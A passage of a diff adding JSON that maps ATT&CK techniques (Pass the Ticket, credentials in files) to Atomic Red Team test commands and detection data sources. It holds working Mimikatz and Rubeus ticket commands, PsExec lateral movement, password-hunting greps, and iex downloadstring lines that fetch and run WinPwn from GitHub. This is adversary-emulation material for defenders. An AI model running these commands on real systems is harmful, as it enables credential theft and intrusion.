+ "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon 
session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + 
"https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1550.003", + "command_list": [ + null, + "PathToAtomicsFolder\\T1550.003\\bin\\mimikatz.exe \"kerberos::ptt #{ticket}\"\n", + "#{psexec_path} -accepteula \\\\localhost -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\localhost\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 'localhost', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:Administrator /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:Password /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w 
c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:$Env:USERDOMAIN /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c $Env:TEMP\\rubeus.exe asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"$Env:TEMP\\rubeus.exe\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"$Env:TEMP\\rubeus.exe\" purge \n", + "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "C:\\PSTools\\PsExec.exe -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n" + ], + "commands": [ + { + "command": null, + 
"source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "PathToAtomicsFolder\\T1550.003\\bin\\mimikatz.exe \"kerberos::ptt #{ticket}\"\n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\localhost -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\localhost\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 'localhost', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:Administrator /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:Password /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 
'#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:$Env:USERDOMAIN /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c $Env:TEMP\\rubeus.exe asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"$Env:TEMP\\rubeus.exe\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"$Env:TEMP\\rubeus.exe\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now 
requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + }, + { + "command": "C:\\PSTools\\PsExec.exe -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n", + "source": "atomics/T1550.003/T1550.003.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Ticket" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1550.003", + "display_name": "Use Alternate Authentication Material: Pass the Ticket", + "atomic_tests": [ + { + "name": "Mimikatz Kerberos Ticket Attack", + "auto_generated_guid": "dbf38128-7ba7-4776-bedf-cc2eed432098", + "description": "Similar to PTH, but attacking Kerberos\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ticket": { + "description": "Ticket file name usually format of 'id-username\\@domain.kirbi' (e.g. 
can be dumped by \"sekurlsa::tickets /export\" module)", + "type": "String", + "default": null + }, + "mimikatz_exe": { + "description": "Path of the Mimikatz binary", + "type": "Path", + "default": "PathToAtomicsFolder\\T1550.003\\bin\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", + "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\Mimi.zip\"\nExpand-Archive $env:TEMP\\Mimi.zip $env:TEMP\\Mimi -Force\nNew-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Mimi\\x64\\mimikatz.exe #{mimikatz_exe} -Force\n" + } + ], + "executor": { + "command": "#{mimikatz_exe} \"kerberos::ptt #{ticket}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Rubeus Kerberos Pass The Ticket", + "auto_generated_guid": "a2fc4ec5-12c6-4fb4-b661-961f23f359cb", + "description": "Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. 
This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).\nPsExec is used to execute commands on the remote system, and the \"C$\" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target": { + "description": "Remote system to request the TGT from", + "type": "string", + "default": "localhost" + }, + "user_name": { + "description": "username associated with the ticket (privileged account not required)", + "type": "String", + "default": "Administrator" + }, + "password": { + "description": "password for user_name", + "type": "String", + "default": "Password" + }, + "domain": { + "description": "domain", + "type": "String", + "default": "$Env:USERDOMAIN" + }, + "rubeus_path": { + "description": "Path of the Rubeus binary", + "type": "Path", + "default": "$Env:TEMP\\rubeus.exe" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + }, + "psexec_path": { + "description": "Path of the PsExec binary", + "type": "String", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Rubeus must exist on disk at specified location (#{rubeus_path})\n", + "prereq_command": "if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}\n" + }, + { + "description": "PsExec must exist on disk at specified location (#{psexec_path})\n", + "prereq_command": "if (Test-Path #{psexec_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile 
\"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_path}\" -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "#{psexec_path} -accepteula \\\\#{target} -w c:\\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi\nSet-Location $env:TEMP\nMove-Item -Force \"\\\\#{target}\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from '#{target}', now requesting a TGS from local\"\n& \"#{rubeus_path}\" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt\nRemove-Item $env:TEMP\\ticket.kirbi\n& \"#{rubeus_path}\" purge \n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon 
session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + 
"https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1552.001", + "command_list": [ + "python2 laZagne.py all\n", + "grep -ri password /\n", + "findstr /si pass *.xml *.doc *.txt *.xls\nls -R | select-string -Pattern password\n", + "type C:\\Windows\\Panther\\unattend.xml\ntype C:\\Windows\\Panther\\Unattend\\unattend.xml\n", + "for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done \n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsensitivefiles -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSnaffler -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowershellsensitive -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npasshunt -local $true -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsessionGopher -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive " + ], + "commands": [ + { + "command": "python2 laZagne.py all\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "grep -ri password /\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "findstr /si pass *.xml *.doc *.txt *.xls\nls -R | select-string -Pattern password\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "type C:\\Windows\\Panther\\unattend.xml\ntype C:\\Windows\\Panther\\Unattend\\unattend.xml\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done \n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsensitivefiles -noninteractive -consoleoutput", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": 
"$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSnaffler -noninteractive -consoleoutput", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowershellsensitive -consoleoutput -noninteractive", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npasshunt -local $true -noninteractive", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red 